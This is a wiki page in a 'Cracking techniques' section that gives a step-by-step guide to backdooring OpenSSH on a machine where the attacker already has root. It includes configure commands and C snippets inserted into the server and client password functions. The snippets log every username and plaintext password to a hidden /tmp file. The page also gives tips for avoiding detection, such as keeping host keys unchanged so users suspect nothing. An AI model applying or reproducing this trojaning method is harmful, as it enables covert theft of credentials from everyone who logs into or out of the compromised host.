Capturing ssh passwords on host using root privileges

From Notes_Wiki

Home > Cracking techniques > Capturing ssh passwords on host using root privileges

Once we have got root access to machine, we can download openssh source code and modify it to capture passwords. Then we can compile this code and install it so that password for all client and server ssh connections get captured. Note that this means that passwords for ssh attempts to other machines from this host using ssh command will get captured along with passwords given during ssh to sshd running on this machine.

We can achieve above using following steps:

  1. Download latest openssh portable source code from http://www.openssh.org/portable.html
  2. Configure using './configure --with-tcp-wrappers --with-pam --with-rand-helper --with-md5-passwords --prefix=/ --sysconfdir=/etc/ssh --sbindir=/usr/sbin --bindir=/usr/bin/'
    --with-audit and --with-selinux give problem during configure or make and hence should be avoided.
  3. make clean
  4. For capturing passwords given to sshd we need to modify 'auth-passwd.c' file. The password is read in function 'auth_passwd'. We can add following code to log the password in temporary file
    FILE *capture_password;
    capture_password=fopen("/tmp/tmpDD302f", "a");
    fprintf(capture_password, "HOST localhost USER %s PASSWORD %s\n", authctxt->user, password);
    fclose(capture_password);
    Do not add code inside #ifdef block so that it gets included irrespective of compilation choices.
  5. For capturing password given to ssh, we need to modify function 'userauth_passwd' in 'sshconnect2.c'. Note that we are modifying only 'sshconnect2.c' since most of the ssh would use protocol version 2.0. If one wants to capture sshv1 passwords then function 'try_password_authentication' in 'sshconnect1.c' needs to be modified.
    FILE *capture_password;
    capture_password=fopen("/tmp/tmpDD302f", "a");
    fprintf(capture_password, "HOST %s USER %s PASSWORD %s\n", host, authctxt->server_user, password);
    fclose(capture_password);
    The lines should be inserted after 'password = read_passphrase(prompt, 0);' call.
  6. 'make'
  7. 'make install'. Note that by default 'make install' does not over-writes files in '/etc/ssh' which is very good for us, since keys wont change and no one will suspect anything. If keys change users may suspect something has changed on server.
  8. 'service sshd restart'. So that new ssh daemon takes over. Most probably existing connections do not get closed due to this.


Home > Cracking techniques > Capturing ssh passwords on host using root privileges